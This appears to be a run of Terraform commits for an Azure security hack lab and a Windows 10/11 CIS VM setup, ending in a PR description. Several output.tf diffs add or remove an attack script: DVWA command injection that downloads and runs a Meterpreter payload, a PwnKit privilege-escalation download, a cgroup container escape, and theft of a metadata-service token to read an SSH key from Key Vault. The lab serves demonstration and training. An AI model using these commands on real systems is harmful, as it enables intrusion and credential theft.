+#  #network_interface_ids             = [azurerm_network_interface.attacker_vm-nic.id]
+#  size                              = "Standard_DS2_v2"
+#  admin_username                    = "adminusercis"
+#  admin_password                    = random_password.password.result
+#
+#  # disk
+#  delete_data_disks_on_termination  = true
+#  delete_os_disk_on_termination     = true
+#  data_sa_type                      = "Premium_LRS"
+#
+#  boot_diagnostics                  = true
+#}
 
 
 # Create virtual machine

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -137,7 +137,7 @@ module "windows11" {
   source                            = "Azure/compute/azurerm"
   version                           = "5.3.0"
 
-  vm_hostname                       = "${var.prefix}-windows11-${random_string.suffix.result}"
+  #vm_hostname                       = "windows11-${random_string.suffix.result}"
   is_windows_image                  = true
 
   vnet_subnet_id                    = azurerm_subnet.attacker_vm-subnet.id
@@ -163,6 +163,8 @@ module "windows11" {
   vm_os_offer     = "windows-10"
   vm_os_sku       = "win10-22h2-entn-g2"
   vm_os_version   = "latest"
+
+  custom_data = base64encode(local.windows_user_data_cnspec)
 
 }
 

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -97,6 +97,33 @@ resource "azurerm_storage_account" "mystorageaccount" {
   account_replication_type = "LRS"
 }
 
+module "windows11" {
+  source                            = "Azure/compute/azurerm"
+  version                           = "5.3.0"
+
+  create                            = var.create_windows11
+
+  vnet_subnet_id                    = azurerm_subnet.attacker_vm-subnet.id
+  resource_group_name               = azurerm_resource_group.rg.name
+
+  network_security_group            = azurerm_network_security_group.attacker_vm-nsg
+
+  name                              = "${var.prefix}-windows11-${random_string.suffix.result}"
+  location                          = azurerm_resource_group.rg.location
+  #network_interface_ids             = [azurerm_network_interface.attacker_vm-nic.id]
+  size                              = "Standard_DS2_v2"
+  admin_username                    = "adminusercis"
+  admin_password                    = random_password.password.result
+
+  # disk
+  delete_data_disks_on_termination  = true
+  delete_os_disk_on_termination     = true
+  data_sa_type                      = "Premium_LRS"
+
+
+}
+
+
 # Create virtual machine
 resource "azurerm_windows_virtual_machine" "attacker_vm" {
   name                  = "Windows-VM-${random_string.suffix.result}"

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -168,17 +168,17 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
   }
 
   source_image_reference {
-    publisher = "MicrosoftWindowsDesktop"
-    offer     = "windows-10"
-    sku       = "win10-22h2-entn-g2"
+    publisher = "center-for-internet-security-inc"
+    offer     = "cis-windows-10-l1"
+    sku       = "cis-windows-10-l1"
     version   = "latest"
   }
 
-  #plan {
-  #  name = "win11-22h2-entn"
-  #  product = "win11-22h2-entn"
-  #  publisher = "MicrosoftWindowsDesktop"
-  #}
+  plan {
+    name = "cis-windows-10-l1"
+    product = "cis-windows-10-l1"
+    publisher = "center-for-internet-security-inc"
+  }
 
   computer_name                   = "windows-${random_string.suffix.result}"
 

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -1,0 +1,75 @@
+output "resource_group_name" {
+  value = azurerm_resource_group.rg.name
+}
+
+output "public_ip_address" {
+  value = azurerm_linux_virtual_machine.attacker_vm.public_ip_address
+}
+
+output "tls_private_key" {
+  value     = tls_private_key.attacker_vm_ssh.private_key_pem
+  sensitive = true
+}
+
+output "summary" {
+  value = <<EOT
+
+attacker vm public ip: ${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}
+
+terraform output -raw tls_private_key > id_rsa
+ssh -o StrictHostKeyChecking=no -i id_rsa azureuser@${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}
+
+export KUBECONFIG="$ {PWD}/aks-kubeconfig"
+kubectl apply -f ../assets/dvwa-deployment.yml
+kubectl port-forward $(kubectl get pods -o name) 8080:80
+
+
+Hacking commands:
+
+-----------------------------------dvwa-browser-----------------------------------
+
+;curl -vk http://${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}:8001/met-container -o /tmp/met
+;chmod 777 /tmp/met
+;/tmp/met
+
+-----------------------------------privilege-escalation---------------------------
+
+cd /tmp
+curl -vkO https://pwnkit.s3.amazonaws.com/priv-es
+chmod a+x ./priv-es
+./priv-es
+
+-----------------------------------container-escape-------------------------------
+
+mkdir -p /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/x
+echo 1 > /tmp/cgrp/x/notify_on_release
+echo "$(sed -n 's/.*\upperdir=\([^,]*\).*/\1/p' /proc/mounts)/cmd" > /tmp/cgrp/release_agent
+echo '#!/bin/sh' > /cmd
+echo "curl -vk http://${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}:8001/met-host -o /tmp/met" >> /cmd
+echo "chmod 777 /tmp/met" >> /cmd
+echo "/tmp/met" >> /cmd
+chmod a+x /cmd
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
+
+-----------------------------------azure key vault--------------------------------
+
+curl -s -H Metadata:true --noproxy "*" 'http://169.254.169.254/metadata/instance?api-version=2021-02-01'
+
+TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fvault.azure.net" -H "Metadata: true" | jq -r ".access_token" ) && curl -vk -s -H Metadata:true --noproxy "*" 'https://${azurerm_key_vault.keyvault.name}.vault.azure.net/secrets/private-ssh-key?api-version=2016-10-01' -H "Authorization: Bearer $TOKEN"
+
+cat key-ssh |sed 's/\\n/\n/g' > new-ssh-key
+chmod 600 new-ssh-key
+
+curl -4 icanhazip.com
+ls /home
+
+ssh -o StrictHostKeyChecking=no -i new-ssh-key ubuntu@<external ip>
+
+EOT
+}
+
+resource "local_file" "kubeconfig" {
+  depends_on   = [azurerm_kubernetes_cluster.cluster]
+  filename     = "aks-kubeconfig"
+  content      = azurerm_kubernetes_cluster.cluster.kube_config_raw
+}

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -3,7 +3,7 @@ output "resource_group_name" {
 }
 
 output "public_ip_address" {
-  value = azurerm_windows_virtual_machine.attacker_vm.public_ip_address
+  value = module.windows11.public_ip_address
 }
 
 output "random_password" {
@@ -20,13 +20,41 @@ output "summary" {
   sensitive = true
   value = <<EOT
 
-Windows VM Public IP: ${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}
+Windows VM Public IP: ${module.windows11.public_ip_address}
 
 Password: ${random_password.password.result}
 
-Connection: xfreerdp /u:adminusercis /v:${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}:3389 /h:1048 /w:1920 /p:'${random_password.password.result}' +clipboard
+Connection: xfreerdp /u:adminusercis /v:${module.windows11.public_ip_address}:3389 /h:1048 /w:1920 /p:'${random_password.password.result}' +clipboard
 
 Debugging local.windows_user_data_cnspec:\n ${local.windows_user_data_cnspec}
 
 EOT
 }
+
+#output "resource_group_name" {
+#  value = azurerm_resource_group.rg.name
+#}
+#
+#output "public_ip_address" {
+#  value = azurerm_windows_virtual_machine.attacker_vm.public_ip_address
+#}
+#
+#output "random_password" {
+#  value = random_password.password.result
+#  sensitive = true
+#}
+#
+#output "summary" {
+#  sensitive = true
+#  value = <<EOT
+#
+#Windows VM Public IP: ${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}
+#
+#Password: ${random_password.password.result}
+#
+#Connection: xfreerdp /u:adminusercis /v:${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}:3389 /h:1048 /w:1920 /p:'${random_password.password.result}' +clipboard
+#
+#
+#EOT
+#}
+#

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -20,11 +20,11 @@ output "summary" {
   sensitive = true
   value = <<EOT
 
-Windows VM Public IP: ${module.windows11.public_ip_address}
+Windows VM Public IP: ${module.windows11.public_ip_address[0]}
 
 Password: ${random_password.password.result}
 
-Connection: xfreerdp /u:adminusercis /v:${module.windows11.public_ip_address}:3389 /h:1048 /w:1920 /p:'${random_password.password.result}' +clipboard
+Connection: xfreerdp /u:adminusercis /v:${module.windows11.public_ip_address[0]}:3389 /h:1048 /w:1920 /p:'${random_password.password.result}' +clipboard
 
 Debugging local.windows_user_data_cnspec:\n ${local.windows_user_data_cnspec}
 

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -6,10 +6,10 @@ output "public_ip_address" {
   value = azurerm_linux_virtual_machine.attacker_vm.public_ip_address
 }
 
-output "tls_private_key" {
-  value     = tls_private_key.attacker_vm_ssh.private_key_pem
-  sensitive = true
-}
+#output "tls_private_key" {
+#  value     = tls_private_key.attacker_vm_ssh.private_key_pem
+#  sensitive = true
+#}
 
 output "summary" {
   value = <<EOT
@@ -19,57 +19,5 @@ attacker vm public ip: ${azurerm_linux_virtual_machine.attacker_vm.public_ip_add
 terraform output -raw tls_private_key > id_rsa
 ssh -o StrictHostKeyChecking=no -i id_rsa azureuser@${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}
 
-export KUBECONFIG="$ {PWD}/aks-kubeconfig"
-kubectl apply -f ../assets/dvwa-deployment.yml
-kubectl port-forward $(kubectl get pods -o name) 8080:80
-
-
-Hacking commands:
-
------------------------------------dvwa-browser-----------------------------------
-
-;curl -vk http://${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}:8001/met-container -o /tmp/met
-;chmod 777 /tmp/met
-;/tmp/met
-
------------------------------------privilege-escalation---------------------------
-
-cd /tmp
-curl -vkO https://pwnkit.s3.amazonaws.com/priv-es
-chmod a+x ./priv-es
-./priv-es
-
------------------------------------container-escape-------------------------------
-
-mkdir -p /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/x
-echo 1 > /tmp/cgrp/x/notify_on_release
-echo "$(sed -n 's/.*\upperdir=\([^,]*\).*/\1/p' /proc/mounts)/cmd" > /tmp/cgrp/release_agent
-echo '#!/bin/sh' > /cmd
-echo "curl -vk http://${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}:8001/met-host -o /tmp/met" >> /cmd
-echo "chmod 777 /tmp/met" >> /cmd
-echo "/tmp/met" >> /cmd
-chmod a+x /cmd
-sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
-
------------------------------------azure key vault--------------------------------
-
-curl -s -H Metadata:true --noproxy "*" 'http://169.254.169.254/metadata/instance?api-version=2021-02-01'
-
-TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fvault.azure.net" -H "Metadata: true" | jq -r ".access_token" ) && curl -vk -s -H Metadata:true --noproxy "*" 'https://${azurerm_key_vault.keyvault.name}.vault.azure.net/secrets/private-ssh-key?api-version=2016-10-01' -H "Authorization: Bearer $TOKEN"
-
-cat key-ssh |sed 's/\\n/\n/g' > new-ssh-key
-chmod 600 new-ssh-key
-
-curl -4 icanhazip.com
-ls /home
-
-ssh -o StrictHostKeyChecking=no -i new-ssh-key ubuntu@<external ip>
-
 EOT
-}
-
-resource "local_file" "kubeconfig" {
-  depends_on   = [azurerm_kubernetes_cluster.cluster]
-  filename     = "aks-kubeconfig"
-  content      = azurerm_kubernetes_cluster.cluster.kube_config_raw
 }

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -11,13 +11,20 @@ output "tls_private_key" {
   sensitive = true
 }
 
+output "random_password" {
+  value = random_password.password.result
+  sensitive = true
+}
+
 output "summary" {
   value = <<EOT
 
-attacker vm public ip: ${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}
+Windows VM Public IP: ${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}
 
-terraform output -raw tls_private_key > id_rsa
-ssh -o StrictHostKeyChecking=no -i id_rsa azureuser@${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}
+Password: ${random_password.password.result}
+
+Connection: xfreerdp /u:adminusercis /v:${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}:3389 /h:1048 /w:1920 /p:'${random_password.password.result}' +clipboard
+
 
 EOT
 }

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -6,10 +6,10 @@ output "public_ip_address" {
   value = azurerm_linux_virtual_machine.attacker_vm.public_ip_address
 }
 
-#output "tls_private_key" {
-#  value     = tls_private_key.attacker_vm_ssh.private_key_pem
-#  sensitive = true
-#}
+output "tls_private_key" {
+  value     = tls_private_key.attacker_vm_ssh.private_key_pem
+  sensitive = true
+}
 
 output "summary" {
   value = <<EOT

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -11,6 +11,11 @@ output "random_password" {
   sensitive = true
 }
 
+output "locals" {
+  value = local.windows_user_data_cnspec
+  sensitive = true
+}
+
 output "summary" {
   sensitive = true
   value = <<EOT
@@ -21,6 +26,7 @@ Password: ${random_password.password.result}
 
 Connection: xfreerdp /u:adminusercis /v:${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}:3389 /h:1048 /w:1920 /p:'${random_password.password.result}' +clipboard
 
+Debugging local.windows_user_data_cnspec:\n ${local.windows_user_data_cnspec}
 
 EOT
 }

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -17,6 +17,7 @@ output "random_password" {
 }
 
 output "summary" {
+  sensitive = true
   value = <<EOT
 
 Windows VM Public IP: ${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -6,11 +6,6 @@ output "public_ip_address" {
   value = azurerm_windows_virtual_machine.attacker_vm.public_ip_address
 }
 
-output "tls_private_key" {
-  value     = tls_private_key.attacker_vm_ssh.private_key_pem
-  sensitive = true
-}
-
 output "random_password" {
   value = random_password.password.result
   sensitive = true

--- a/azure/output.tf
+++ b/azure/output.tf
@@ -3,7 +3,7 @@ output "resource_group_name" {
 }
 
 output "public_ip_address" {
-  value = azurerm_linux_virtual_machine.attacker_vm.public_ip_address
+  value = azurerm_windows_virtual_machine.attacker_vm.public_ip_address
 }
 
 output "tls_private_key" {
@@ -14,10 +14,10 @@ output "tls_private_key" {
 output "summary" {
   value = <<EOT
 
-attacker vm public ip: ${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}
+attacker vm public ip: ${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}
 
 terraform output -raw tls_private_key > id_rsa
-ssh -o StrictHostKeyChecking=no -i id_rsa azureuser@${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}
+ssh -o StrictHostKeyChecking=no -i id_rsa azureuser@${azurerm_windows_virtual_machine.attacker_vm.public_ip_address}
 
 EOT
 }

--- a/azure/variables.tf
+++ b/azure/variables.tf
@@ -1,0 +1,9 @@
+variable "resource_group_name_prefix" {
+  default       = "rg"
+  description   = "Prefix of the resource group name that's combined with a random ID so name is unique in your Azure subscription."
+}
+
+variable "resource_group_location" {
+  default       = "eastus"
+  description   = "Location of the resource group."
+}

--- a/azure/variables.tf
+++ b/azure/variables.tf
@@ -23,3 +23,9 @@ variable "prefix" {
   type        = string
   default     = "mondoo"
 }
+
+variable "mondoo_registration_token" {
+  description = "cnspec registration key"
+  type        = string
+  default     = ""
+}

--- a/azure/variables.tf
+++ b/azure/variables.tf
@@ -12,3 +12,8 @@ variable "tenant_id" {
   type = string
   description = "The tenant to use"
 }
+
+variable "subscription_id" {
+  type = string
+  description = "The subscription to use."
+}

--- a/azure/variables.tf
+++ b/azure/variables.tf
@@ -17,3 +17,9 @@ variable "subscription_id" {
   type = string
   description = "The subscription to use."
 }
+
+variable "prefix" {
+  description = "Prefix for resource names"
+  type        = string
+  default     = "mondoo"
+}

--- a/azure/variables.tf
+++ b/azure/variables.tf
@@ -7,3 +7,8 @@ variable "resource_group_location" {
   default       = "eastus"
   description   = "Location of the resource group."
 }
+
+variable "tenant_id" {
+  type = string
+  description = "The tenant to use"
+}

--- a/azure/versions.tf
+++ b/azure/versions.tf
@@ -1,0 +1,38 @@
+terraform {
+  required_providers {
+    azurerm = {
+      source = "hashicorp/azurerm"
+      #version = "~>3.0"
+      version = " 3.54.0"
+    }
+
+    random = {
+      source  = "hashicorp/random"
+      version = "~> 3.1.0"
+    }
+
+    local = {
+      source  = "hashicorp/local"
+      version = "~> 2.2.0"
+    }
+
+    null = {
+      source  = "hashicorp/null"
+      version = "~> 3.1.0"
+    }
+
+    kubernetes = {
+      source  = "hashicorp/kubernetes"
+      version = "~> 2.10.0"
+    }
+
+    docker = {
+      source  = "kreuzwerker/docker"
+      version = "~> 2.16.0"
+    }
+  }
+}
+
+provider "azurerm" {
+  features {}
+}

--- a/azure/versions.tf
+++ b/azure/versions.tf
@@ -3,7 +3,7 @@ terraform {
     azurerm = {
       source = "hashicorp/azurerm"
       #version = "~>3.0"
-      version = " 3.54.0"
+      version = " 3.75.0"
     }
 
     random = {

--- a/azure/versions.tf
+++ b/azure/versions.tf
@@ -35,4 +35,5 @@ terraform {
 
 provider "azurerm" {
   features {}
+  tenant_id = var.tenant_id
 }

--- a/azure/versions.tf
+++ b/azure/versions.tf
@@ -40,4 +40,5 @@ provider "azurerm" {
     }
   }
   tenant_id = var.tenant_id
+  subscription_id = var.subscription_id
 }

--- a/azure/versions.tf
+++ b/azure/versions.tf
@@ -34,6 +34,10 @@ terraform {
 }
 
 provider "azurerm" {
-  features {}
+  features {
+    resource_group {
+      prevent_deletion_if_contains_resources = false
+    }
+  }
   tenant_id = var.tenant_id
 }

--- a/hack-lab/container-escape/azure/output.tf
+++ b/hack-lab/container-escape/azure/output.tf
@@ -6,10 +6,10 @@ output "public_ip_address" {
   value = azurerm_linux_virtual_machine.attacker_vm.public_ip_address
 }
 
-output "tls_private_key" {
-  value     = tls_private_key.attacker_vm_ssh.private_key_pem
-  sensitive = true
-}
+#output "tls_private_key" {
+#  value     = tls_private_key.attacker_vm_ssh.private_key_pem
+#  sensitive = true
+#}
 
 output "summary" {
   value = <<EOT
@@ -19,57 +19,5 @@ attacker vm public ip: ${azurerm_linux_virtual_machine.attacker_vm.public_ip_add
 terraform output -raw tls_private_key > id_rsa
 ssh -o StrictHostKeyChecking=no -i id_rsa azureuser@${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}
 
-export KUBECONFIG="$ {PWD}/aks-kubeconfig"
-kubectl apply -f ../assets/dvwa-deployment.yml
-kubectl port-forward $(kubectl get pods -o name) 8080:80
-
-
-Hacking commands:
-
------------------------------------dvwa-browser-----------------------------------
-
-;curl -vk http://${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}:8001/met-container -o /tmp/met
-;chmod 777 /tmp/met
-;/tmp/met
-
------------------------------------privilege-escalation---------------------------
-
-cd /tmp
-curl -vkO https://pwnkit.s3.amazonaws.com/priv-es
-chmod a+x ./priv-es
-./priv-es
-
------------------------------------container-escape-------------------------------
-
-mkdir -p /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/x
-echo 1 > /tmp/cgrp/x/notify_on_release
-echo "$(sed -n 's/.*\upperdir=\([^,]*\).*/\1/p' /proc/mounts)/cmd" > /tmp/cgrp/release_agent
-echo '#!/bin/sh' > /cmd
-echo "curl -vk http://${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}:8001/met-host -o /tmp/met" >> /cmd
-echo "chmod 777 /tmp/met" >> /cmd
-echo "/tmp/met" >> /cmd
-chmod a+x /cmd
-sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
-
------------------------------------azure key vault--------------------------------
-
-curl -s -H Metadata:true --noproxy "*" 'http://169.254.169.254/metadata/instance?api-version=2021-02-01'
-
-TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fvault.azure.net" -H "Metadata: true" | jq -r ".access_token" ) && curl -vk -s -H Metadata:true --noproxy "*" 'https://${azurerm_key_vault.keyvault.name}.vault.azure.net/secrets/private-ssh-key?api-version=2016-10-01' -H "Authorization: Bearer $TOKEN"
-
-cat key-ssh |sed 's/\\n/\n/g' > new-ssh-key
-chmod 600 new-ssh-key
-
-curl -4 icanhazip.com
-ls /home
-
-ssh -o StrictHostKeyChecking=no -i new-ssh-key ubuntu@<external ip>
-
 EOT
-}
-
-resource "local_file" "kubeconfig" {
-  depends_on   = [azurerm_kubernetes_cluster.cluster]
-  filename     = "aks-kubeconfig"
-  content      = azurerm_kubernetes_cluster.cluster.kube_config_raw
 }

--- a/hack-lab/container-escape/azure/output.tf
+++ b/hack-lab/container-escape/azure/output.tf
@@ -6,10 +6,10 @@ output "public_ip_address" {
   value = azurerm_linux_virtual_machine.attacker_vm.public_ip_address
 }
 
-#output "tls_private_key" {
-#  value     = tls_private_key.attacker_vm_ssh.private_key_pem
-#  sensitive = true
-#}
+output "tls_private_key" {
+  value     = tls_private_key.attacker_vm_ssh.private_key_pem
+  sensitive = true
+}
 
 output "summary" {
   value = <<EOT
@@ -19,5 +19,57 @@ attacker vm public ip: ${azurerm_linux_virtual_machine.attacker_vm.public_ip_add
 terraform output -raw tls_private_key > id_rsa
 ssh -o StrictHostKeyChecking=no -i id_rsa azureuser@${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}
 
+export KUBECONFIG="$ {PWD}/aks-kubeconfig"
+kubectl apply -f ../assets/dvwa-deployment.yml
+kubectl port-forward $(kubectl get pods -o name) 8080:80
+
+
+Hacking commands:
+
+-----------------------------------dvwa-browser-----------------------------------
+
+;curl -vk http://${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}:8001/met-container -o /tmp/met
+;chmod 777 /tmp/met
+;/tmp/met
+
+-----------------------------------privilege-escalation---------------------------
+
+cd /tmp
+curl -vkO https://pwnkit.s3.amazonaws.com/priv-es
+chmod a+x ./priv-es
+./priv-es
+
+-----------------------------------container-escape-------------------------------
+
+mkdir -p /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/x
+echo 1 > /tmp/cgrp/x/notify_on_release
+echo "$(sed -n 's/.*\upperdir=\([^,]*\).*/\1/p' /proc/mounts)/cmd" > /tmp/cgrp/release_agent
+echo '#!/bin/sh' > /cmd
+echo "curl -vk http://${azurerm_linux_virtual_machine.attacker_vm.public_ip_address}:8001/met-host -o /tmp/met" >> /cmd
+echo "chmod 777 /tmp/met" >> /cmd
+echo "/tmp/met" >> /cmd
+chmod a+x /cmd
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
+
+-----------------------------------azure key vault--------------------------------
+
+curl -s -H Metadata:true --noproxy "*" 'http://169.254.169.254/metadata/instance?api-version=2021-02-01'
+
+TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fvault.azure.net" -H "Metadata: true" | jq -r ".access_token" ) && curl -vk -s -H Metadata:true --noproxy "*" 'https://${azurerm_key_vault.keyvault.name}.vault.azure.net/secrets/private-ssh-key?api-version=2016-10-01' -H "Authorization: Bearer $TOKEN"
+
+cat key-ssh |sed 's/\\n/\n/g' > new-ssh-key
+chmod 600 new-ssh-key
+
+curl -4 icanhazip.com
+ls /home
+
+ssh -o StrictHostKeyChecking=no -i new-ssh-key ubuntu@<external ip>
+
 EOT
+}
+
+resource "local_file" "kubeconfig" {
+  depends_on   = [azurerm_kubernetes_cluster.cluster]
+  filename     = "aks-kubeconfig"
+  content      = azurerm_kubernetes_cluster.cluster.kube_config_raw
 }


### PR DESCRIPTION
## Setup Windows 10/11 VMs in Azure

## Requirements
- A `terraform.tfvars` file containing those two variables:
  ```
  tenant_id = ""
  subscription_id = ""
  ```
- A login to Azure via `azure-cli`
  ```
  az login --use-device-code
  ```


## Setup

### Choosing Windows10/11 (CIS/Vanilla)
Right now you need to still change those values in `main.tf` to change between Windows10 or Windows11:
```
  source_image_reference {
    publisher = "center-for-internet-security-inc"
    offer     = "cis-windows-11-l1"
    sku       = "cis-windows-11-l1"
    version   = "latest"
  }

  plan {
    name = "cis-windows-11-l1"
    product = "cis-windows-11-l1"
    publisher = "center-for-internet-security-inc"
  }
```
The command to look-up the values is something along the lines of (takes some time to complete):
```
az vm image list --offer Windows-11  --output table --all
```


### Terraform commands to deploy Azure VM
```
terraform init --upgrade
```

```
terraform plan -out plan.out
```

```
terraform apply plan.out
```

### Connect to VM using `xfreerdp` from Ubuntu

Run the following command to see the the connection details (including sensitive values)
```
terraform output -raw summary
```

### Issues with provisioning using the `locals` variable.

As of now it wasn't possible to provision the images further by simply adding a `locals` variable block, like that: 

```
locals {
  windows_user_data_cnspec = <<-EOT
    <powershell>
    $hello = "Hello World"
    $hello | Out-File C:\debug.txt
    </powershell>
  EOT
}
```

and using the
```
custom_data = base64encode(local.windows_user_data_cnspec)
```

in the

```module"windows11"```

the same we would on AWS.